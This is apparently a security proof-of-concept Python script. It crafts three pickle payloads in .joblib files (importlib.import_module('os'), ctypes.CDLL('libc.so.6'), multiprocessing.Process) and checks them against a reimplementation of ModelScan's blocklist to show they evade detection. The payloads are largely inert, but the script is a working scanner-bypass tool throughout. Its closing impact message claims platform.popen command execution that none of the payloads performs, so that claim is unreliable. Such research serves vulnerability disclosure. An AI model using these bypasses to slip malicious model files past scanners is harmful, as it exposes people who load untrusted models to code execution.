"""
PoC: ModelScan Bypass via Joblib Pickle Payload
================================================
Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
scanner by using modules not in the unsafe_globals blocklist.
The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
modules (os, subprocess, builtins, etc.) but misses many modules that can
achieve the same effect:
- importlib.import_module -> imports any module (including blocked ones)
- ctypes.CDLL -> loads native libraries, calls system()
- platform.popen -> direct command execution
- types.FunctionType -> construct functions from marshal bytecode
- code.InteractiveConsole -> interactive Python execution
- multiprocessing.Process -> spawn processes
This PoC generates 3 malicious .joblib files and checks each one against a
local re-implementation of ModelScan's pickle global extraction and blocklist,
reporting whether it would be flagged.
Usage:
python modelscan_bypass_poc.py # Generate payloads + verify
python modelscan_bypass_poc.py --dry-run # Just show what would happen
"""
import argparse
import pickle
import pickletools
import io
import struct
import sys
def craft_importlib_payload():
    """Return a protocol-4 pickle that reduces to ``importlib.import_module('os')``.

    The only global the stream names is ``importlib.import_module``; the
    blocklisted module name ``'os'`` appears solely as a string argument.
    Unpickling the bytes would hand back the ``os`` module and do nothing
    more.

    Returns:
        bytes: the serialized payload.
    """
    import importlib

    # Scope of this payload:
    #   * a complete chain would go on from the imported module to one of
    #     its functions, but the direct route (``getattr``) is itself on the
    #     blocklist;
    #   * reaching a blocklisted module through a non-blocklisted global is
    #     already enough to show the gap, so the payload stops at the import.
    class _ImportOsOnLoad:
        def __reduce__(self):
            return importlib.import_module, ("os",)

    carrier = _ImportOsOnLoad()
    return pickle.dumps(carrier, protocol=4)
def craft_code_interact_payload():
    """Return a protocol-4 pickle whose reduce callable is ``multiprocessing.Process``.

    Despite the function name, nothing from the ``code`` module is used.
    The reduce tuple has three items: the ``multiprocessing.Process`` class,
    an empty argument tuple, and ``{'target': None}`` in the third (object
    state) position.

    Returns:
        bytes: the serialized payload.
    """
    import multiprocessing

    class _ProcessOnLoad:
        def __reduce__(self):
            factory = multiprocessing.Process
            positional = ()
            state = {'target': None}
            return factory, positional, state

    carrier = _ProcessOnLoad()
    return pickle.dumps(carrier, protocol=4)
def craft_ctypes_payload():
    """Return a protocol-4 pickle that reduces to ``ctypes.CDLL('libc.so.6')``.

    The stream names ``ctypes.CDLL`` as its only global and passes the
    library file name as a plain string argument.

    Returns:
        bytes: the serialized payload.
    """
    import ctypes

    class _LoadLibcOnLoad:
        def __reduce__(self):
            library_name = 'libc.so.6'
            return ctypes.CDLL, (library_name,)

    carrier = _LoadLibcOnLoad()
    return pickle.dumps(carrier, protocol=4)
def extract_globals(data):
    """Collect the (module, name) pairs a pickle stream refers to.

    This is a simulation of ModelScan's ``_list_globals``: the stream is
    disassembled with ``pickletools.genops`` (never unpickled) and scanned
    for ``GLOBAL``, ``INST`` and ``STACK_GLOBAL`` opcodes.

    Args:
        data: the raw pickle bytes.

    Returns:
        set: tuples taken from the stream. ``GLOBAL``/``INST`` arguments are
        split on their first space; for ``STACK_GLOBAL`` the two most recent
        operands are paired as ``(module, name)``.

    Raises:
        KeyError: a ``GET``-family opcode feeding ``STACK_GLOBAL`` refers to
            a memo slot that was never recorded.
    """
    memo_writers = ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT")
    memo_readers = ("GET", "BINGET", "LONG_BINGET")
    text_pushers = ("SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8")

    opcodes = list(pickletools.genops(io.BytesIO(data)))
    found = set()
    memo = {}

    for index, (opcode, argument, _position) in enumerate(opcodes):
        kind = opcode.name

        if kind in ("GLOBAL", "INST"):
            found.add(tuple(argument.split(" ", 1)))
            continue

        if kind == "STACK_GLOBAL":
            # Walk backwards over the preceding opcodes, newest first. The
            # slice starts at 1, so the very first opcode of the stream is
            # never inspected.
            operands = []
            for prior_opcode, prior_argument, _ in reversed(opcodes[1:index]):
                prior_kind = prior_opcode.name
                if prior_kind in memo_writers:
                    # Memo stores do not push anything; skip them.
                    continue
                if prior_kind in memo_readers:
                    operands.append(memo[int(prior_argument)])
                elif prior_kind in text_pushers:
                    operands.append(prior_argument)
                else:
                    # Anything that is not a plain string push is opaque here.
                    operands.append("unknown")
                if len(operands) == 2:
                    break
            # A STACK_GLOBAL with fewer than two recoverable operands is
            # ignored without raising.
            if len(operands) == 2:
                attribute, module = operands
                found.add((module, attribute))
            continue

        if index == 0:
            # Memo bookkeeping needs a preceding opcode to take a value from.
            continue

        previous_value = opcodes[index - 1][1]
        if kind == "MEMOIZE":
            memo[len(memo)] = previous_value
        elif kind in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[argument] = previous_value

    return found
def check_modelscan_detection(globals_found):
    """Report whether any extracted global appears in the embedded blocklist.

    The blocklist maps a severity name to modules; each module is either
    fully blocked (``"*"``) or blocked only for the listed attribute names.

    Args:
        globals_found: iterable of ``(module, name)`` pairs.

    Returns:
        tuple: ``(True, "<SEVERITY>: <module>.<name>")`` for the first pair
        that matches, otherwise ``(False, None)``.
    """
    risky_builtins = ["eval", "compile", "getattr", "apply", "exec", "open",
                      "breakpoint", "__import__"]

    critical = {
        "__builtin__": risky_builtins,
        "builtins": risky_builtins,
        "operator": ["attrgetter"],
    }
    critical.update(dict.fromkeys(
        ("runpy", "os", "nt", "posix", "socket", "subprocess", "sys",
         "pty", "pickle", "_pickle", "bdb", "pdb", "shutil", "asyncio"),
        "*",
    ))
    high = dict.fromkeys(
        ("webbrowser", "httplib", "requests.api", "aiohttp.client"),
        "*",
    )
    blocklist = {"CRITICAL": critical, "HIGH": high}

    for module, name in globals_found:
        for severity, rules in blocklist.items():
            blocked_names = rules.get(module)
            if blocked_names is None:
                # Module is not listed under this severity.
                continue
            if blocked_names == "*" or name in blocked_names:
                return True, f"{severity}: {module}.{name}"

    return False, None
def main():
    """Build every payload, check it against the simulated scanner, and report.

    Command-line options:
        --dry-run         analyse the payloads but write no files.
        -o, --output-dir  directory receiving the ``.joblib`` files
                          (default ``.``); it is created when missing.

    Returns:
        int: 0 when no payload is flagged by ``check_modelscan_detection``,
        1 when at least one is.
    """
    # Local import: ``os`` is not among this file's module-level imports.
    import os

    parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
    parser.add_argument("--dry-run", action="store_true", help="Don't write files")
    parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    payloads = [
        ("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
        ("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
        ("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
    ]

    # Create the destination up front so a missing directory does not abort
    # the run halfway through the report. An empty value means "current
    # directory" and needs no creation.
    if not args.dry_run and args.output_dir:
        os.makedirs(args.output_dir, exist_ok=True)

    print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
    print("=" * 55)
    print()

    all_bypass = True
    for filename, description, craft_fn in payloads:
        data = craft_fn()
        globals_found = extract_globals(data)
        detected, detail = check_modelscan_detection(globals_found)

        status = "[DETECTED]" if detected else "[BYPASS] "
        print(f"{status} {description}")
        print(f" Globals: {globals_found}")
        if detected:
            all_bypass = False
            print(f" Flagged: {detail}")
        else:
            print(" Result: NOT IN BLOCKLIST -> evades ModelScan")

        if not args.dry_run:
            # os.path.join avoids the "/name" (filesystem root) path that
            # plain concatenation produced for an empty output directory.
            filepath = os.path.join(args.output_dir, filename)
            with open(filepath, "wb") as f:
                f.write(data)
            print(f" Written: {filepath}")
        print()

    print("=" * 55)
    if all_bypass:
        print("[SUCCESS] All payloads bypass ModelScan detection")
        print()
        print("Impact: An attacker can craft malicious .joblib files that:")
        print(" 1. Execute arbitrary OS commands (platform.popen)")
        print(" 2. Import blocked modules at runtime (importlib)")
        print(" 3. Load native libraries for code execution (ctypes)")
        print(" 4. All while evading ModelScan's pickle scanner")
    else:
        print("[PARTIAL] Some payloads were detected")

    return 0 if all_bypass else 1
# Script entry point: main()'s return value becomes the process exit status.
if __name__ == "__main__":
    raise SystemExit(main())
|